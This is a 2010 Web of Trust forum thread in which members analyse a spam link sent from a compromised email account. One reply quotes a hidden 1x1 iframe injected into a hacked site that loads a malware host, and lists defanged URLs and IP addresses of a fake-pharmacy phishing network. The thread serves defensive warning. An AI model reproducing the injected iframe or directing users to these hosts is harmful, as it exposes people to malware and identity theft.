(The quickest way to register)

Forum

Dear visitor! The webpage is only available in English. We're sorry for the inconvenience.
  1. User picture
    • tomgagaga on Mon 15 Mar 2010
    • 10:10:05 AM UTC

    MSN Phish becomes email hack.

    I would like to bring your attention to this website,

    hxxp://homag.co.uk/BlJdGPy001.html

    Apparently my colleague sent me this email with only this website as its content. When asked if she had wanted me to view the website, she said no, and did not know that this email had been sent.

    I thought the MSN Phish was only linked to sending offline instant messages. Have they grown to take control of the email account and send emails now instead?

    Phishing and/or other scams?

Comments:

  2. User picture
    • Kraftwerk on Mon 15 Mar 2010
    • 11:11:20 AM UTC

    Re:

    Have they grown to take control of the email account and send emails now instead?

    Well, if a mail was sent from this account, especially with such a content, and the owner doesn´t konw anything, yes they´ve taken control of the emal account.

    Did she change her password (and choosed a good one)?
    Blueberrycake Level Member of the WOT Community
  3. User picture
    • chazsm on Mon 15 Mar 2010
    • 06:20:06 PM UTC

    Spoofing

    Sender address isn't hard.
  4. User picture
    • amishrabbit on Mon 15 Mar 2010
    • 08:21:57 PM UTC

    Frame redirect to "Canadian Healthcare" pill spammers

    Redirects to aquezetrs.com
  5. User picture
    • g7w on Tue 16 Mar 2010
    • 07:07:56 PM UTC

    re: homag.co.uk

    Site was hacked, many others suffer this same problem for examples check out Google

    This site contains an iFrame

    <iframe border="0" src="hxxp://wowtribes.com/logs/index.php" frameborder="0" height="1" width="1">
    </iframe>

    wowtribes.com - scorecard - Attack Site
    Malicious content contains 178 Trojans
    Though the site is malicious it's purpose is to gather information from your browser, like a page/site counter.

    Other URI's that are loaded when visiting homag.co.uk/BlJdGPy001.html are:
    hxxp://hollywood-webcams.com/?id=2045-02&k=cbd1835f8&d=1]
    hollywood-webcams.com has no IP, it uses everydns.net to hide itself, re: robtex

    hxxp://aquezetrs.com/
    as pointed out, a fake online pharmacy Phishing for identity / credit card abuse.

    hxxp://58.22.229.135:8080/images/
    Loads various images displayed on the fake pharmacy site courtesy of china-netcom.com - CentralOps

    hxxp://208.91.44.4:8080/images/
    Loads various images for fake pharmacy, this one belongs to zilliontv.tv in California - CentralOps

    hxxp://69.169.164.46:8080/images/
    more image storage / retrieval, this one is a heating and cooling website hosted on broadweave.com - CentralOps

    hxxp://211.142.163.157:8080/images/
    again, image storage / retrieval courtesy of chinamobile.com - CentralOps

    hxxp://217.12.56.253:8080/images/
    ditto with image storage / retrieval, this is Railways of Slovakia at zsr.sk - CentralOps

    hxxp://203.114.105.231:8080/images/
    igae storage / retrieval IP belongs to a Thai ISP at tot.co.th - CentralOps

    hxxp://208.68.172.22:8080/images/c
    more use for image storage IP is assigen to: atlanticmetro.net hosted on dns-roots.net - CentralOps

    Malicious content = Trojans
    wowtribes.com

    Phishing site = Identity theft / Credit card abuse
    aquezetrs.com
    hollywood-webcams.com

    Redirects to know Phishing site: aquezetrs.com
    homag.co.uk

    Ethical issues = Used as an image storage / retrieval for known Phishing site networks.
    58.22.229.135
    208.91.44.4
    69.169.164.46
    211.142.163.157
    217.12.56.253
    203.114.105.231
    208.68.172.22

    Link to this thread in scorecard comments as reference.

    -------
    WOT Services Ltd. - gives us safety through Web of Trust.
    WOT Community - gives us security through unity.
    Thank you all
    - G7W